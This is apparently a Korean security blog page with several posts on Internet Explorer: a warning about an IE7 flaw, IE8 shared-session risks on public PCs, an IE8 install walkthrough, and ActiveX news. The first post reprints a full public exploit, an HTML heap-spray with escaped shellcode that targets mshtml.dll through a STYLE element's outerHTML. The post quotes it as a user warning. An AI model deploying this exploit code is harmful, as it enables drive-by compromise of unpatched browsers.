시큐리티포커스에 올라온 버그트랙에 보면 IE7.0 취약서을 이용한 공격 익스플로잇 소스가 공개 되었습니다. 사용자 주의가 요망됩니다.

http://www.securityfocus.com/archive/1/507984/30/0/threaded


<!--
securitylab.ir
K4mr4n_st (at) yahoo (dot) com [email concealed]
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>

</HEAD>
<BODY onload="load()">
</BODY>
</HTML>



알려진 바로는  Microsoft HTML viewer (mshtml.dll)  와 internal style sheet  (CSS/STYLE) object via document.getElementsByTagName() method  를 공격하는 것으로 나타났다. (관련글 링크 : 여기)        


http://seclists.org/bugtraq/2009/Nov/148  에도 링크가 되어 있는데 백신에서 바로 감지하네요..


익스플로러 취약성 공격코드




MS 다음패치일인 12월8일에 패치 될것으로 생각되고 있고 IE8.0 에서는 이러한 취약점이 발견되지 않은 것으로 알려지고 있다.  빠른 시일내에 업그레이드를 해야만 하겠다. 참고 바랍니다.

지금 바로 IE8.0 으로 업그레이드 하시기 바랍니다.


Posted by 엔시스


모 이통사 홈페이지를 방문을 했다가 다음과 같은 팝업 창을 보았습니다. 필자는 IE8.0을 사용하지 않기에 그리 걱정이 되지는 않지만 최근 IE8.0 사용자가 자꾸 늘어남으로 인하여 여러가지 보안적인 부분에서 언급이 될수 있겠습니다.




                                              <모 이통사에 올라온 IE8.0 보안 위험 공지사항>




1. 공유 PC에서는 아주 위험합니다.



우리가 생활하다보면 어쩔수 없이 공유PC를 사용하는 경우가 있습니다. 물론 조심하여 사용해야 겠지요. 이미 공유PC에 대한 포스팅을 하여 반향을 일으킨 적도 있습니다. 아래 링크 참고 하시기 바랍니다.


관련포스팅
2009/04/27 - [생활속의정보보호] - 모텔 PC에서 함부로 로그인 하지마세요



그런데 위와 같이 IE8.0 공유세션에 위험 요소가 있다면 조심을 해야 하는것은 당연한 것입니다., 그것은 우리가 흔히 "로그아웃"보다는 창을 그냥 닫아 버리는데 익숙해 있기 때문입니다. 그렇다면 세션을 공유하고 있기 때문에 다음 사용자가 브라우져를 띄우면 로그인이 되어 있다는 이야기입니다. 아주 위험한 경우죠...




2. 그럼 해결 방법은 없을까?




그래서 검색을 잠시 해 보았습니다. 위에는 간단하게 두가지 정도 언급을 해 놓았지만 기술적으로 할수 있는 방법이 없는지 살펴 보았습니다.


http://2cpu.co.kr/bbs/board.php?bo_table=freeboard&wr_id=623876

http://arrestlove.tistory.com/87



에 관련 포스팅이 되어 있었습니다. 물론 저는 IE8.0을 사용하고 있지 않기에 적용 할 필요가 없겠지만 혹시 출장을 자주 간다던지 아니면 자신의 PC가 아닌곳에서 작업을 한다고 하면 우선 브라우져 버전도 체크를 해야 겠습니다.



사실 이런 경우 개인 프라이버시와 관련이 있기에 사적인 메일이나 그럴경우에는 아주 난감할수 있겠습니다. 그냥 뭐..어때서라고 넘어 갈수 있는 문제일수도 있겠지만 본인이 직접 해당이 되면 상황은 틀려 지겠지요...

사실 이러한 문제점들은 많은 보안을 다루는 기관이나 업체에서도 홍보를 해야 하고 불특정 다수인이 피해가 가지 않도록 홍보를 해야 하는데 알리는 곳이 잘 없군요..


그렇다고 한다면 이러한 공지를 팝업으로 띄워준 "이통사"는 잘 한 일이라고 해야 겠습니다. 지난번 개인정보보호 수집에 대해서는 못 하는 부분이 많았지만 잘 한것은 잘했다라고 칭찬을 해야 하는 것이 맞다고 생각을 합니다. 혹시 보안을 담당하고 있는 기관이나 담당자분들께서는 이러한 사항을 사내 공지 메일이나 팝업 또는 다른 수단을 이용하여 많이 알려 주어야 겠습니다.

참고 하시기 바랍니다..@엔시스.




Posted by 엔시스


보안이 한층 강화된 IE8 한글판이 출시 되었다고 하네요...

IE8 출시, “웹상에서 악성코드 잡는다”


위 사이트에서 화살표시 되어 있는 곳에서 다운로드를 클릭을 합니다..



그럼 한국어로 지원이 되고 있고 오른쪽에는 xp와 비스타 두개의 버전이 있습니다..자신이 사용하고 있는 운영체제에 맞게 선택하여 클릭을 하시면 됩니다..




이제 익스플로러8 이 설치 시작 됩니다...다음을 클릭합니다..



약관에 대한 동의입니다..동의함에 클릭합니다..


기존에 익스플로러7이 설치 되어 있었기에 업데이트 설치를 하게 됩니다..시간이 조금 오래 걸립니다..다음을 클릭합니다..


설치사 완료되면 위 그림과 같은 메세지를 보여 줍니다..지금 다시시작을 합니다..




재시작후에 위와 같은 그림이 보이네요..



추천 사이트 사용이라는 것이 구체적으로 무엇을 의미 하는지는 잘 모르겠습니다..

우선 조금 빨라진 느낌이 있긴하는데 조금 더 써 봐야겠습니다....이젠 MS 말대로라면 악성코드 잡는 일만 남았네요..


 
Posted by 엔시스

오늘자  한국경제 신문에는 내년 2월에 출시되는 'IE8.0' 에는 '엑티브X' 기능이 축소 된다고 발표가 되었다.

사용자 삽입 이미지
                                               <기사 출처: 한국경제 2008-07-21일자>
드디어 올것이 왔구나..그동안 엑티브 엑스를 프로그래밍 하기 쉽다는 핑계로 많은 웹싸이트 개발자들 사이에서 너도 나도 사용하던 방법이었다.

하지만 이젠 오히려 MS에게 발목을 잡히게 되었다. 뒷통수 맞은 기분일 것이다. 지금부터 개발해도 내년 2월까지는 그리 시간이 많지 않은 시간이다.

한 나라의 99%가 한 글로벌한 거대 회사에 종속되어 있다는 것은 어제 오늘 일이 아니며  수많은 논의가 되어 왔으나 어느누구도 인식을 바꾸려고 하지 않았다. 또한 실제 그렇게 함으로 인하여 불편함을 감수하려고도 하지 않았다.

이제는 내년에는 싫든 좋든 간에 엑티브X가 아닌 다른 방식으로 프로그램을 구현해야 한다.  사용자들은 탈 MS를 할 것이다. 이제는 무엇 보다 싸이트 개발자가 웹 표준 중요성을 알고 어떤 하나에 의존적이기 보다는 범용적인 개발 방법론을 제시 해야 하겠다.


덧  2008.07.23

 xeraph  님의 트랙백으로 사실 관계를 찾아 보니 기능이 축소 되기 보단 조금은 선별적으로 사용되는 것 같은데 기사에는 마치 제목에는 축소라고 했지만 본문에는 제공되지 않는 것 처럼 기사화 되었습니다. 이 부분은 포스팅을 읽는 분들의 올바른 지식 전달이 필요합니다. 따라서 완전히 제거 되는 것이 아님을 다시한번 밝힙니다.


Posted by 엔시스
TAG IE8.0